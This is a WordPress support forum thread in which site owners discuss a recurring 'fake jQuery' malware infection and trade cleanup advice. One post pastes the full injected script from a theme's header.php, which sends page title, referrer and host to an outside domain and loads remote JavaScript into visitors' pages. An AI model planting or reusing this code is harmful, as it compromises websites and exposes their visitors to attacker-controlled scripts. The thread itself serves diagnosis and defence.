WordPress Blog Infected With Malware – Malware.fake_jquery.001

Sucuri has a 404 page for that malware definition and I hope it is updated soon.

the page is here: https://labs.sucuri.net/signatures/malware-entry-mwjsgen2
did you manage to clean up your website?

Yes I cleaned it up by removing the script from theme editor and it’s fine for 1 week and now it’s back again! Any better way please? ??

the same here. still looking for code to clean

Is possible hacker may have added the code into the actual page or post.

Go to the page or post in question and view as text, then scroll down.

Same problem here. Every day the code is back.

My wp-includes/nav-menu.php was infected with strange code, I removed that code. Further I found a strange PHP-file (license.php) in wp-includes/Text/.

All removed and still code is coming back. I will keep searching.

In the audit log of plugin Sucuri Security I saw that user ‘system’ with IP ::1 changed the header.php of my template again yesterday evening.

Yes I removed it from The Theme Header (header.php) and it’s all good then the next they it comes back again.

Here’s the new code:

<script>var a=”; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = “https://wildwillis.net/js/jquery.min.php&#8221;; var n_url = base + “?default_keyword=” + default_keyword + “&se_referrer=” + se_referrer + “&source=” + host; var f_url = base + “?c_utt=snt2014&c_utm=” + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== ” && se_referrer !== null && se_referrer !== ”){document.write(‘<script type=”text/javascript” src=”‘ + f_url + ‘”>’ + ‘<‘ + ‘/script>’);}</script>

Does anyone know how to solve this problem please?

Having the same issue – any recommendations on how to fix it?

If the malware continues to reappear after you’ve removed the offending script then there must be some vulnerable software on your site, compromised password, injected backdoor or bogus wp-admin administrator user that is being used to reinfect.

Once you remove the malicious script be sure to:

1) Update all software (WP core, plugins and themes)
2) Change all administrator passwords (wp-admin, FTP, cPanel, etc)
3) Check for any bogus wp-admin administrator users

If the problem continues I would recommend replacing your core WordPress files. It also wouldn’t hurt to reinstall your plugins/themes in the event that there is some injected backdoor there.

There are also some common places to hide backdoors like in these directories:

./wp-content
./wp-content/plugins
./wp-content/themes

Often the index.php file in those directories gets overwritten, or they add some file with a name like plugin.php or css.php or something like that, but there are many other places they can be hiding.

This article goes into some more detail:

https://blog.sucuri.net/2015/11/jquery-min-php-malware-affects-thousands-of-websites.html

I hope that helps.

Hi rngdmstr, Isaw that article and I removed the malware from header.php and update everything. However the malware still come back.

That article also say ” check for the jquery.min.php in the /js directory.”

I try to find that code in the js directory but it’s not there. I’m not sure where on the server that the malware get injected automatically again.

Thanks for your suggestion anyway.

Any other advice would be greatly appreciated.

Hi Everyone,

I too was having the same problem with several of my websites. I think I have found the solution, since the malware hasn’t returned yet.

1. Change your cpanel password and to be safe, change your WordPress password. I realized after removing the malware, it was always returning. Which means there was a script file added to my server, that wasn’t show up on the malware scan.

2. Download the Sucuri malware plugin. Once the plugin is installed and you get your API key, go the the Sucuri dashboard. There will be a red/pink box informing you, that there has been a change made to your wordpress core files. Delete any files you do not recognize (The file will be something very deceiving, like .ftpquota) . (This will delete the script file that keep reinstalling the malware to your website.) You can do a malware scan and pay to have Sucuri remove the malware. I’m not sure how much it cost, if you do not want to pay head to step 3.

3. Download the Anti-Malware plugin, get your API key and download the newest definitions. Run a complete website scan, it should find the malware , remove it once it is finish downloading. I would suggest donating the $29 for such and awesome plugin! Most companies will charge $200+ to remove the malware.

These are the steps I took to clean my sites. If there is any change to any of my sites I will reply with new changes I have made or if anyone needs any help feel free to contact me.

Thank you

liemng007 does this site reside in the same hosting environment as other websites? Is it a shared hosting environment? The issue might be cross-contamination:

https://blog.sucuri.net/2012/03/a-little-tale-about-website-cross-contamination.html

i’ve solved the issue installing Sucuri plugin and “hardening” directories wp-content and wp-includes.

I already deleted the injected codes on my header.php but still when i scan my website it seems like it is still in some of my pages
https://sitecheck.sucuri.net/results/bnacedu.com

Can anyone help me?

@24eagle1989 the malicious code could be in a few different places, but it’s common to find this infection within theme files. Try uploading a fresh copy of your theme and see if that helps. Be sure to flush any cache you are using on the site before rescanning with Sitecheck.